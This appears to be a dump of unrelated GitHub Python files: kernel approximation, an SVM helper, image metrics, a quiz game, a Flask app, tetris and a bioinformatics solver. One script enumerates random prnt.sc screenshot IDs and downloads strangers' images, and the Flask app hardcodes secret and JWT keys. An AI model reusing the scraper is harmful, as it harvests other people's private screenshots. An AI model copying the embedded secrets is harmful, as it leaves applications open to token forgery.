self._reduced_kernel_matrix = (
self._reduced_kernel_matrix + self._reduced_kernel_matrix.T
) / 2.0 # enforce symmetry of kernel matrix
# Compute auxiliary quantities.
self._sqrtm_pinv_reduced_kernel_matrix = sp.linalg.sqrtm(
np.linalg.pinv(self._reduced_kernel_matrix, rcond=1.0e-6, hermitian=True)
)
# Check that complex part is negligible and eliminate it
if np.iscomplexobj(self._sqrtm_pinv_reduced_kernel_matrix):
threshold_imaginary_part = 1.0e-6
max_imaginary_part = np.max(
np.abs(np.imag(self._sqrtm_pinv_reduced_kernel_matrix))
)
# if max_imaginary_part > threshold_imaginary_part:
# warnings.warn("Maximum imaginary part is {}".format(max_imaginary_part))
self._sqrtm_pinv_reduced_kernel_matrix = np.real(
self._sqrtm_pinv_reduced_kernel_matrix
)
def approximate_kernel_matrix(
self,
X: np.ndarray,
# Needed for sklearn compatibility
X_prime: Optional[np.ndarray] = None,
) -> np.ndarray:
"""Approximate the kernel matrix using Nystroem features."""
X_features = self.fit_transform(X)
return X_features @ X_features.T
def fit_transform(
self,
X: np.ndarray,
X_prime: Optional[np.ndarray] = None,
) -> np.ndarray:
"""Compute Nyström features."""
self.fit(X)
return self.transform(X)
def transform(self, X_prime: np.ndarray) -> np.ndarray:
"""Compute Nystroem features with precomputed quantities."""
J = self.kernel(X_prime, self._X_reduced)
return J @ self._sqrtm_pinv_reduced_kernel_matrix
def demo_kernel_approximation_features(
X: np.ndarray,
kernel: Callable[[np.ndarray, np.ndarray], np.ndarray],
features_sampler_class: Union[
Type[RandomFeaturesSampler], Type[NystroemFeaturesSampler]
],
features_sampler_kwargs: np.ndarray,
n_features: np.array,
) -> None:
"""Kernel approximation using random sampled features.
Either RFF or Nyström features."""
n_plots = len(n_features) + 1
fig, axes = plt.subplots(1, n_plots)
fig.set_size_inches(15, 4)
font = {"fontname": "arial", "fontsize": 18}
kernel_matrix = kernel(X, X)
axes[0].imshow(kernel_matrix, cmap=plt.cm.Blues)
axes[0].set_title("Exact kernel", **font)
axes[0].set_xticks([])
axes[0].set_yticks([])
for n_f, ax in zip(n_features, axes[1:]):
print("# of features = ", n_f)
features_sampler = features_sampler_class(
**features_sampler_kwargs, n_random_features=n_f
)
X_features = features_sampler.fit_transform(X)
kernel_matrix_approx = X_features @ X_features.T
ax.imshow(kernel_matrix_approx, cmap=plt.cm.Blues)
err_approx = kernel_matrix - kernel_matrix_approx
err_mean = np.mean(np.abs(err_approx))
err_max = np.max(np.abs(err_approx))
ax.set_xlabel(
"err (mean) = {:.4f} \n err (max) = {:.4f}".format(err_mean, err_max),
**font
)
ax.set_title("{} features".format(n_f), **font)
ax.set_xticks([])
ax.set_yticks([])
plt.tight_layout()
plt.show()
def plot_kernel_error(
X: np.ndarray,
kernel: Callable[[np.ndarray, np.ndarray], np.ndarray],
features_sampler_class: Union[
Type[RandomFeaturesSampler], Type[NystroemFeaturesSampler]
],
features_sampler_kwargs: np.ndarray,
n_features: np.ndarray,
kernel_name: str,
) -> None:
# Initialize variables
kernel_matrix = kernel(X, X)
errors = np.array([], dtype=float)
for n_f in n_features:
# Create sampler
features_sampler = features_sampler_class(
**features_sampler_kwargs, n_random_features=n_f
)
# Compute approximation
X_features = features_sampler.fit_transform(X)
kernel_matrix_approx = X_features @ X_features.T
# Compute error
mean_error = np.mean(np.abs(kernel_matrix - kernel_matrix_approx))
errors = np.append(errors, mean_error)
# Plotting
_, ax = plt.subplots(1, 1, figsize=(10, 6))
font = {"fontname": "arial", "fontsize": 18}
ax.plot(n_features, errors, color="deepskyblue", label=r"kernel error")
ax.set_title("{} kernel error study".format(kernel_name), **font)
if __name__ == "__main__":
"""
import matplotlib.pyplot as plt
import numpy as np
from sklearn import datasets, svm
from sklearn.kernel_approximation import RBFSampler
from sklearn.metrics.pairwise import rbf_kernel
import kernel_approximation as ka
# A not so simple 2 D problem
X, Y = datasets.make_moons(n_samples=100, noise=0.3, random_state=0)
# Compute grid of points for plotting the decision regions
grid_x, grid_y = np.meshgrid(
np.linspace(-3, 3, 50),
np.linspace(-3, 3, 50),
)
grid_X = np.c_[grid_x.ravel(), grid_y.ravel()]
gamma = 0.5
# Kernel matrix
def kernel(X, Y):
return rbf_kernel(X, Y, gamma=gamma)
n_nystroem_features = 20
nystroem_sampler = NystroemFeaturesSampler(kernel)
nystroem_features = nystroem_sampler.fit_transform(X)
nystroem_features_grid = nystroem_sampler.transform(grid_X)
clf = svm.SVC(kernel='linear')
# clf = svm.NuSVC(gamma='auto')
clf.fit(nystroem_features, Y)
"""
import matplotlib.pyplot as plt
import numpy as np
from sklearn import datasets
from sklearn.gaussian_process.kernels import Matern
from sklearn.kernel_approximation import RBFSampler
from sklearn.metrics.pairwise import rbf_kernel
# 3-D data
n_instances = 1000
X, t = datasets.make_s_curve(n_instances, noise=0.1)
X = X[np.argsort(t)]
# 2-D data
# X, y = datasets.make_moons(n_samples=400, noise=.05)
# X = X[np.argsort(y)]
# Reshape if necessary
if X.ndim == 1:
X = X[:, np.newaxis]
# Kernel parameters
sigma = 1.0
gamma = 1.0 / (2.0 * sigma**2)
n_nystroem_features = [10, 100, 1000]
# Kernel function
def kernel(X, Y):
return rbf_kernel(X, Y, gamma=gamma)
nystroem_features = NystroemFeaturesSampler(kernel)
demo_kernel_approximation_features(
X,
kernel,
nystroem_features,
n_nystroem_features,
)
| fjsaezm/mcd-mf | HW_02/kernel_approximation.py | kernel_approximation.py | py | 12,959 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "abc.ABC",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "sklearn.base.BaseEstimator",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "sklearn.base.TransformerMixin",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "nump... |
71904356193 | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import string
import random
import time
path = "D:\chromedriver.exe"
driver = webdriver.Chrome(path)
print("Opening up the browser")
driver.get("https://prnt.sc/")
print("Preparing cookies...")
driver.find_element_by_css_selector('.css-47sehv').click()
time.sleep(2)
while True:
rastgele = ''.join(random.choices(string.ascii_lowercase + string.digits, k = 6))
site = str(f'http://prnt.sc/{rastgele}')
time.sleep(1)
print("Accessing this site: "+ site)
driver.get(site)
time.sleep(0.5)
print("Locating image...")
time.sleep(2)
filename = 'result'+rastgele+'.png'
try:
x = driver.find_element_by_xpath('//*[@id="screenshot-image"]')
print("Downloading image...")
print(x)
with open(filename, 'wb') as file:
file.write(driver.find_element_by_xpath('//*[@id="screenshot-image"]').screenshot_as_png)
print("File successfully downloaded! File name : " + filename)
except:
print("Image not found, going to the next link") | Zeunig/py.prntscraper | prntscr.py | prntscr.py | py | 1,102 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "time.sleep",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "random.choices"... |
1187043277 | from sklearn.svm import LinearSVC
import metodos as m
def ObtenerHiperParametros(x_train, y_train, x_test, y_test):
parametros = [
{ 'penalty': ['l1'], 'C': [1, 10, 100], 'dual': [False], 'class_weight': [{1:4}, {1:5}] }
]
medida = 'recall'
return m.GridSearch(LinearSVC(), parametros, medida, x_train, y_train, x_test, y_test)
def Entrenar(x_train, y_train, parametros):
# Después de aplicar Grid Search de determinaron los siguiente parámetros
# {'C': 1, 'class_weight': {1: 5}, 'dual': False, 'penalty': 'l1'}
modelo = LinearSVC(C=1, penalty='l1', dual=False, class_weight={1:5})
modelo.fit(x_train, y_train)
return modelo | erichuizapucp/credit-card-fraud-detection | notebooks/SVM.py | SVM.py | py | 675 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "metodos.GridSearch",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "sklearn.svm.LinearSVC",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "sklearn.svm.LinearSVC",
"line_number": 16,
"usage_type": "call"
}
] |
347104407 | from graphviz import Digraph as DotGraph
MAX_EDGES = 2000
def gshow(g, attr=None, file_name=None, view=False):
if g is None: return
""" shows a networx DiGraph g
using graphviz
it could become slow on large graphs (above MAX_EDGES)
"""
ecount = g.number_of_edges()
if ecount > MAX_EDGES:
print('GRAPH TOO BIG TO SHOW, EDGES=', ecount)
return
dot = DotGraph()
for e in gen_dot_edges(g, attr=attr):
f, t, w = e
dot.edge(f, t, label=w)
print('generated:', file_name, 'edges:', ecount)
dot.render(file_name, view=view)
def gen_dot_edges(g, attr=None):
for e in g.edges():
f, t = e
if not attr:
w = ''
else:
w = g[f][t].get(attr)
if not w: w = ''
if not isinstance(f, str): f = "#" + str(f)
if not isinstance(t, str): t = "#" + str(t)
f = f.replace(':', '.')
t = t.replace(':', '.')
w = str(w)
yield (f, t, w)
def xshow(gs, attr=None, file_name=None, view=False):
""" shows a sequence of (possibly originating from the same,
via a transformation) displayed together, left to right
"""
dot = DotGraph()
ecount = 0
for i, g in enumerate(gs):
k = g.number_of_edges()
ecount += k
if ecount > MAX_EDGES:
print('GRAPH CHAIN TOO BIG TO SHOW, EDGES=', ecount)
return
for f, t, w in gen_dot_edges(g, attr=attr):
mark = "@" + str(i)
dot.edge(f + mark, t + mark, label=w)
print('generated:', file_name, 'edges:', ecount)
dot.render(file_name, view=view)
| ptarau/StanzaGraphs | logic/visualizer.py | visualizer.py | py | 1,657 | python | en | code | 8 | github-code | 1 | [
{
"api_name": "graphviz.Digraph",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "graphviz.Digraph",
"line_number": 45,
"usage_type": "call"
}
] |
37691349335 | import os
from PIL import Image
import torchvision
import torch, cv2, math, random
import numpy as np
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
device_id = [0]
IMG_EXTENSIONS = ['jpg', 'jpeg', 'png', 'ppm', 'bmp', 'pgm']
def mkdir(path):
if not os.path.exists(path):
os.makedirs(path)
def pil_loader(path, mode='RGB'):
"""
open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835)
:param path: image path
:return: PIL.Image
"""
assert _is_image_file(path), "%s is not an image" % path
with open(path, 'rb') as f:
with Image.open(f) as img:
return img.convert(mode)
def calculate_RF(model):
layers = getLayers(model)
r = 1
for layer in layers[::-1]:
if isinstance(layer, torch.nn.Conv2d):
kernel = layer.kernel_size[0]
padding = layer.padding[0]
stride = layer.stride[0]
r = stride * r + (kernel - stride)
return r
def getLayers(model):
"""
get each layer's name and its module
:param model:
:return: each layer's name and its module
"""
layers = []
def unfoldLayer(model):
"""
unfold each layer
:param model: the given model or a single layer
:param root: root name
:return:
"""
# get all layers of the model
layer_list = list(model.named_children())
for item in layer_list:
module = item[1]
sublayer = list(module.named_children())
sublayer_num = len(sublayer)
# if current layer contains sublayers, add current layer name on its sublayers
if sublayer_num == 0:
layers.append(module)
# if current layer contains sublayers, unfold them
elif isinstance(module, torch.nn.Module):
unfoldLayer(module)
unfoldLayer(model)
return layers
def load_as_tensor(path, mode='RGB'):
"""
Load image to tensor
:param path: image path
:param mode: 'Y' returns 1 channel tensor, 'RGB' returns 3 channels, 'RGBA' returns 4 channels, 'YCbCr' returns 3 channels
:return: 3D tensor
"""
if mode != 'Y':
return PIL2Tensor(pil_loader(path, mode=mode))
else:
return PIL2Tensor(pil_loader(path, mode='YCbCr'))[:1]
def PIL2Tensor(pil_image):
return torchvision.transforms.functional.to_tensor(pil_image)
def Tensor2PIL(tensor_image, mode='RGB'):
if len(tensor_image.size()) == 4 and tensor_image.size()[0] == 1:
tensor_image = tensor_image.view(tensor_image.size()[1:])
return torchvision.transforms.functional.to_pil_image(tensor_image.detach().cpu(), mode=mode)
def _is_image_file(filename):
"""
judge if the file is an image file
:param filename: path
:return: bool of judgement
"""
filename_lower = filename.lower()
return any(filename_lower.endswith(ext) for ext in IMG_EXTENSIONS)
def image_files(path):
"""
return list of images in the path
:param path: path to Data Folder, absolute path
:return: 1D list of image files absolute path
"""
abs_path = os.path.abspath(path)
image_files = os.listdir(abs_path)
for i in range(len(image_files)):
if (not os.path.isdir(image_files[i])) and (_is_image_file(image_files[i])):
image_files[i] = os.path.join(abs_path, image_files[i])
return image_files
def split_to_batches(l, n):
for i in range(0, len(l), n):
yield l[i:i + n]
def _sigmoid_to_tanh(x):
"""
range [0, 1] to range [-1, 1]
:param x: tensor type
:return: tensor
"""
return (x - 0.5) * 2.
def _tanh_to_sigmoid(x):
"""
range [-1, 1] to range [0, 1]
:param x:
:return:
"""
return x * 0.5 + 0.5
def _add_batch_one(tensor):
"""
Return a tensor with size (1, ) + tensor.size
:param tensor: 2D or 3D tensor
:return: 3D or 4D tensor
"""
return tensor.view((1, ) + tensor.size())
def _remove_batch(tensor):
"""
Return a tensor with size tensor.size()[1:]
:param tensor: 3D or 4D tensor
:return: 2D or 3D tensor
"""
return tensor.view(tensor.size()[1:])
def mod_crop(tensor, scale=4):
B, C, H, W = tensor.shape
return tensor[:, :, :H-H % scale, :W-W % scale]
def isotropic_gaussian_kernel(l, sigma, epsilon=1e-5):
ax = np.arange(-l // 2 + 1., l // 2 + 1.)
xx, yy = np.meshgrid(ax, ax)
kernel = np.exp(-(xx ** 2 + yy ** 2) / (2. * (sigma + epsilon) ** 2))
return kernel / np.sum(kernel)
def prepare_images(hr_path, scale=4):
hr_pil = Image.open(hr_path)
sizex, sizey = hr_pil.size
hr_pil = hr_pil.crop((0, 0, sizex - sizex % scale, sizey - sizey % scale))
sizex, sizey = hr_pil.size
lr_pil = hr_pil.resize((sizex // scale, sizey // scale), Image.BICUBIC)
return lr_pil, hr_pil
def same_seeds(seed = 2022):
random.seed(seed)
np.random.seed(seed) # 保证后续使用random函数时,产生固定的随机数
torch.manual_seed(seed) # 固定随机种子(CPU)
# if torch.cuda.is_available(): # 固定随机种子(GPU)
torch.cuda.manual_seed(seed) # 为当前GPU设置
torch.cuda.manual_seed_all(seed) # 为所有GPU设置
torch.use_deterministic_algorithms(True)
torch.backends.cudnn.enabled = False
torch.backends.cudnn.benchmark = False # GPU、网络结构固定,可设置为True
torch.backends.cudnn.deterministic = True # 固定网络结构
os.environ['PYTHONHASHSEED'] = str(seed)
os.environ['CUBLAS_WORKSPACE_CONFIG'] = ':4096:8'
def post_process(input):
out = torch.clamp(input, min=0., max=1.)
out = np.moveaxis(torch.squeeze(out,0).detach().cpu().numpy(), 0, 2)
out = out * 255
out = out.astype(np.uint8)
return out
def calculate_psnr(img1, img2):
# img1 and img2 have range [0, 255]
img1 = img1.astype(np.float64)
img2 = img2.astype(np.float64)
mse = np.mean((img1 - img2) ** 2)
if mse == 0:
return float("inf")
return 20 * math.log10(255.0 / math.sqrt(mse))
def ssim(img1, img2):
C1 = (0.01 * 255) ** 2
C2 = (0.03 * 255) ** 2
img1 = img1.astype(np.float64)
img2 = img2.astype(np.float64)
kernel = cv2.getGaussianKernel(11, 1.5)
window = np.outer(kernel, kernel.transpose())
mu1 = cv2.filter2D(img1, -1, window)[5:-5, 5:-5] # valid
mu2 = cv2.filter2D(img2, -1, window)[5:-5, 5:-5]
mu1_sq = mu1 ** 2
mu2_sq = mu2 ** 2
mu1_mu2 = mu1 * mu2
sigma1_sq = cv2.filter2D(img1 ** 2, -1, window)[5:-5, 5:-5] - mu1_sq
sigma2_sq = cv2.filter2D(img2 ** 2, -1, window)[5:-5, 5:-5] - mu2_sq
sigma12 = cv2.filter2D(img1 * img2, -1, window)[5:-5, 5:-5] - mu1_mu2
ssim_map = ((2 * mu1_mu2 + C1) * (2 * sigma12 + C2)) / (
(mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2)
)
return ssim_map.mean()
def calculate_ssim(img1, img2):
"""calculate SSIM
the same outputs as MATLAB's
img1, img2: [0, 255]
"""
if not img1.shape == img2.shape:
raise ValueError("Input images must have the same dimensions.")
if img1.ndim == 2:
return ssim(img1, img2)
elif img1.ndim == 3:
if img1.shape[2] == 3:
ssims = []
for i in range(3):
ssims.append(ssim(img1, img2))
return np.array(ssims).mean()
elif img1.shape[2] == 1:
return ssim(np.squeeze(img1), np.squeeze(img2))
else:
raise ValueError("Wrong input image dimensions.")
# def calculate_psnr(img1, img2, border=0):
# # img1 and img2 have range [0, 255]
# #img1 = img1.squeeze()
# #img2 = img2.squeeze()
# if not img1.shape == img2.shape:
# raise ValueError('Input images must have the same dimensions.')
# h, w = img1.shape[:2]
# img1 = img1[border:h-border, border:w-border]
# img2 = img2[border:h-border, border:w-border]
#
# img1 = img1.astype(np.float64)
# img2 = img2.astype(np.float64)
# mse = np.mean((img1 - img2)**2)
# if mse == 0:
# return float('inf')
# return 20 * math.log10(255.0 / math.sqrt(mse))
#
#
# # --------------------------------------------
# # SSIM
# # --------------------------------------------
# def calculate_ssim(img1, img2, border=0):
# '''calculate SSIM
# the same outputs as MATLAB's
# img1, img2: [0, 255]
# '''
# #img1 = img1.squeeze()
# #img2 = img2.squeeze()
# if not img1.shape == img2.shape:
# raise ValueError('Input images must have the same dimensions.')
# h, w = img1.shape[:2]
# img1 = img1[border:h-border, border:w-border]
# img2 = img2[border:h-border, border:w-border]
#
# if img1.ndim == 2:
# return ssim(img1, img2)
# elif img1.ndim == 3:
# if img1.shape[2] == 3:
# ssims = []
# for i in range(3):
# ssims.append(ssim(img1[:,:,i], img2[:,:,i]))
# return np.array(ssims).mean()
# elif img1.shape[2] == 1:
# return ssim(np.squeeze(img1), np.squeeze(img2))
# else:
# raise ValueError('Wrong input image dimensions.')
#
#
# def ssim(img1, img2):
# C1 = (0.01 * 255)**2
# C2 = (0.03 * 255)**2
#
# img1 = img1.astype(np.float64)
# img2 = img2.astype(np.float64)
# kernel = cv2.getGaussianKernel(11, 1.5)
# window = np.outer(kernel, kernel.transpose())
#
# mu1 = cv2.filter2D(img1, -1, window)[5:-5, 5:-5] # valid
# mu2 = cv2.filter2D(img2, -1, window)[5:-5, 5:-5]
# mu1_sq = mu1**2
# mu2_sq = mu2**2
# mu1_mu2 = mu1 * mu2
# sigma1_sq = cv2.filter2D(img1**2, -1, window)[5:-5, 5:-5] - mu1_sq
# sigma2_sq = cv2.filter2D(img2**2, -1, window)[5:-5, 5:-5] - mu2_sq
# sigma12 = cv2.filter2D(img1 * img2, -1, window)[5:-5, 5:-5] - mu1_mu2
#
# ssim_map = ((2 * mu1_mu2 + C1) * (2 * sigma12 + C2)) / ((mu1_sq + mu2_sq + C1) *
# (sigma1_sq + sigma2_sq + C2))
# return ssim_map.mean()
def cv2_to_pil(img):
image = Image.fromarray(cv2.cvtColor(img.astype(np.uint8), cv2.COLOR_BGR2RGB))
return image
def pil_to_cv2(img):
image = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)
return image | painfulloop/Fingerprinting_IR_DNNs | ModelZoo/utils.py | utils.py | py | 10,291 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "torch.device",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "torch.cuda.is_available",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.path.exists",
... |
6398213595 | from random import randint, choice
from datetime import datetime
now = datetime.now()
current_time = now.strftime("%d/%m/%Y")
file_name = "math_game_log.txt"
# Functions
def append_wrong_answer(answer,operation,file_name=file_name):
with open(file_name, 'a') as f:
f.write(f'\tExpression: {operation}, User Input: {answer}, '\
f'Expected: {eval(operation)}\n')
def check_if_int(answer):
'''Checks if the input is an integer. '''
try:
int(answer)
except ValueError:
print('Your answer cannot contain anything other than numbers. Please try again: ')
return False
else:
return True
def addition(a, b):
operation = f"{a} + {b}"
answer = input(operation + ' = ')
while check_if_int(answer) == False:
answer = input ('\n'+operation + ' = ')
if eval(operation) == int(answer):
return('Excellent!')
else:
append_wrong_answer(answer, operation)
return(f'Incorrect. The correct answer is {eval(operation)}.')
def subtraction(a, b):
if difficulty == 'easy':
while b>a:
x1,x2 = difficulty_lvls['easy'][0][0], difficulty_lvls['easy'][0][-1]
a, b= randint(x1, x2), randint(x1, x2)
operation = f"{a} - {b}"
answer = input (operation + ' = ')
while check_if_int(answer) == False:
answer = input ('\n'+operation + ' = ')
if eval(operation) == int(answer):
return(f'Correct! Well done, {name}.')
else:
append_wrong_answer(answer, operation)
return(f'Incorrect. The correct answer is {eval(operation)}.')
def multiplication(a, b):
operation = f"{a} * {b}"
answer = input(operation + ' = ')
while check_if_int(answer) == False:
answer = input ('\n'+operation + ' = ')
if eval(operation) == int(answer):
return(f'Good job, {name}!')
else:
append_wrong_answer(answer, operation)
return(f'Incorrect. The correct answer is {eval(operation)}.')
# *Actual game:*
"""For the dictionary below:
The first element of each list is the smallest possible number to be used
the second is the largest possible number. The first list is for the addition and
subtraction questionss, the second is for the multiplication questions."""
difficulty_lvls = {
'easy': [[5, 30], [2, 11]],
'intermediate': [[10, 50], [3, 12]],
'difficult':[[12,100],[4, 17]],
'expert': [[30, 2000], [6, 30]],
}
name = input('Please enter your name: ').title()
difficulty = input("Difficulty level (easy, intermediate, difficult, expert): ")
while difficulty not in difficulty_lvls:
difficulty = input("\nYou chose a non-existent level."\
"Please try again(easy, intermediate, difficult, expert): ")
# while False
# while difficulty in difficulty_lvls == False:
# difficulty = input("\nYou chose a non-existent level."\
# "Please try again(easy, intermediate, difficult, expert): ")
with open(file_name) as f:
contents = f.read()
with open(file_name, 'a') as f:
if current_time not in contents:
f.write(current_time + ': \n')
f.write('\n'+name+':')
f.write('\n\t'+difficulty.title()+'\n')
lst = ['addition', 'subtraction', 'multiplication']
greeting = (f"\nHello, {name}. You'll be given a chance to exit this program "\
" and level up after every 5 attempts. Let's begin! \n")
print(greeting)
i = 0
while True:
if i%5==0:
d=difficulty
x1,x2=difficulty_lvls[d][0][0], difficulty_lvls[d][0][-1]
y1,y2=difficulty_lvls[d][-1][0], difficulty_lvls[d][-1][-1]
# The issue here is that randint does not accept ranges
a1,a2 = randint(x1, x2), randint(x1, x2)
m1,m2 = randint(y1, y2), randint(y1, y2)
'''Randomizer'''
chosen = choice(lst)
if chosen == lst[0]:
print(addition(a1, a2))
elif chosen == lst[1]:
print(subtraction(a1, a2))
else:
print(multiplication(m1, m2))
i+=1
if i %5 == 0:
print('\n')
answer = input(f'Would you like to continue, {name}? (yes/no) ')
if answer == 'no':
break
# Here we ask if the user wants to go on to the next level. We must first
# check if the user is not currently at the last level as there is no lvl to lvl up to.
if difficulty in list(difficulty_lvls.keys())[:-1]:
lvl_up = input("Would you like to advance to the next level? (yes/no) ")
if lvl_up == 'yes':
next_index = list(difficulty_lvls.keys()).index(difficulty)+1
difficulty = list(difficulty_lvls.keys())[next_index]
print(f"\nNew difficulty level: {difficulty.title()}\n")
with open(file_name, 'a') as f:
f.write('\n\t'+difficulty.title()+'\n')
| Tjlhut/basic_math_game | basic_math_game.py | basic_math_game.py | py | 4,818 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "datetime.datetime.now",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 3,
"usage_type": "name"
},
{
"api_name": "random.randint",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "random.randint",... |
37639002029 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import sys
import argparse
import numpy as np
from collections import defaultdict,Counter
__author__ = 'menghao'
__mail__ = 'haomeng@genome.cn'
bindir = os.path.abspath(os.path.dirname(__file__))
pat1 = re.compile('^\s*$')
def parser_fasta(fasta):
seq = []
Dict = defaultdict(list)
with open(fasta) as IN:
for line in IN:
if line.startswith('>'):
name = line.rstrip()[1:]
continue
Dict[name] += line.rstrip()
for i in Dict:
seq.append([j for j in Dict[i]])
return np.array(seq)
def main():
parser = argparse.ArgumentParser(usage='Consensus_and_Profile',
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog='author:\t{0}\nmail:\t{1}'.format(__author__, __mail__))
parser.add_argument('-i', '--input', help='input', dest='input', required=True)
args = parser.parse_args()
seq = parser_fasta(args.input)
Dict = defaultdict(list)
consensus = ''
for i in range(seq.shape[1]):
total = Counter(seq[:,i])
consensus += total.most_common(1)[0][0]
for c in ('A', 'C', 'T', 'G'):
Dict[c].append(str(total[c]))
print(consensus)
for c in ('A', 'C', 'T', 'G'):
print('{0}: {1}'.format(c,' '.join(Dict[c])))
if __name__ == "__main__":
main()
| whenfree/Rosalind | Consensus_and_Profile/Consensus_and_Profile.py | Consensus_and_Profile.py | py | 1,521 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.path.abspath",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_n... |
26922251758 | from flask import Flask, request, jsonify
from models.db import db
from models.User_model import User
from backend.controller.extensions import bcrypt, jwt_manager, session
from datetime import datetime, timezone, timedelta
from flask_jwt_extended import get_jwt, create_access_token, get_jwt_identity
from flask_cors import CORS
import json
def create_app():
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///database.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SECRET_KEY'] = "215fb79f1848d253c541f30f2e83a86965d178fed3594e7adf4df128a90fb2633af7bbded04ff63f4214cb1d896cd2e119a9f6da64c26a74d283911c32fb5a4f"
app.config['SESSION_TYPE'] = 'filesystem'
app.config['JWT_SECRET_KEY'] = "06973e058893087d8aa8d73513c35254e097b25fe75131ad53dacf6e06296227e58955fad64d4d00862ac73a6d089ce7d422c017bab866eb8893be4540884d41"
cors = CORS(app)
with app.app_context():
db.init_app(app)
bcrypt.init_app(app)
jwt_manager.init_app(app)
session.init_app(app)
@app.after_request
def refresh_expiring_jwts(response):
try:
exp_timestamp = get_jwt()["exp"]
now = datetime.now(timezone.utc)
target_timestamp = datetime.timestamp(now + timedelta(minutes=30))
if target_timestamp > exp_timestamp:
print(get_jwt_identity())
access_token = create_access_token(identity=get_jwt_identity())
data = response.get_json()
if type(data) is dict:
data["access_token"] = access_token
response.data = json.dumps(data)
return response
except (RuntimeError, KeyError):
# Case where there is not a valid JWT. Just return the original respone
return response
@jwt_manager.user_lookup_loader
def user_lookup_callback(_jwt_header, jwt_data):
identity = jwt_data["sub"]
return User.query.filter_by(email=identity).one_or_none()
from routes.Container_routes import container_bp
from routes.Auth_routes import auth_bp
app.register_blueprint(container_bp, url_prefix='/api/v1/weblab')
app.register_blueprint(auth_bp, url_prefix='/api/v1/auth')
db.create_all()
return app | abhirambsn/stuniq-web-desktop | backend/app.py | app.py | py | 2,415 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "flask.Flask",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "models.db.db.init_app",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "models.db.db",
... |
14905473093 | import sys
from time import sleep
import pygame
from settings import Settings
import game_functions as gf
# from tetrominos import IShape
from tetrominos import IShape
def run_game():
pygame.init()
# Load game settings.
settings = Settings()
screen = pygame.display.set_mode(
(settings.screen_width, settings.screen_height))
pygame.display.set_caption(settings.title)
# ishape = IShape(settings, 'I')
ishape = IShape(settings)
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_q:
sys.exit()
screen.fill(settings.color['white'])
# Draw the grid lines.
gf.show_grid(settings, screen)
ishape.draw(screen)
# ishape.draw(screen)
# ishape.drop()
# # ishape.move()
ishape.rotate()
sleep(1)
pygame.display.flip()
if __name__ == '__main__':
run_game()
| DeepWalter/python-projects | tetris/tetris.py | tetris.py | py | 1,057 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pygame.init",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "settings.Settings",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pygame.display.set_mode",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "pygame.display"... |
32304885265 | import matplotlib
import matplotlib.pyplot as plt
import pandas as pd
import sys
import matplotlib.dates as mdates
fin = sys.argv[1]
fin_raw = sys.argv[2]
font = {'size': 14}
matplotlib.rc('font', **font)
data = pd.read_csv(fin, parse_dates=True, index_col=0)
data_raw = pd.read_csv(fin_raw, parse_dates=True, index_col=0)
fig, ax = plt.subplots(figsize=(14, 8))
ax.plot(data.index, data['load_kg'], 'k')
ax.plot(data_raw.index, data_raw['load_kg'], 'g')
plt.fill_between(data.index, ax.get_ylim()[0], data['load_kg'], color=(1, 0.2, 0.2, 0.2))
plt.minorticks_on()
fig.autofmt_xdate()
# Use a more precise date string for the x axis locations in the toolbar.
ax.fmt_xdata = mdates.DateFormatter('%Y-%m-%d')
ax.grid(which='major', axis='both', linewidth=1.5, color='gray')
ax.xaxis.grid(True, 'minor', color='gray', alpha=0.3, ls='-', lw=1)
ax.yaxis.grid(True, 'minor', color='gray', alpha=0.3, ls='-', lw=1)
ax.set_xlabel('datetime')
ax.set_ylabel('load kg')
plt.grid('minor')
plt.tight_layout()
fout = fin.replace('.csv', '_withRaw.pdf')
plt.savefig(fout)
plt.show()
| Peruz/load_data | plot_raw_and_processed.py | plot_raw_and_processed.py | py | 1,070 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.argv",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.rc",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_n... |
20407001822 | #!/usr/bin/python
import argparse
import json
import os
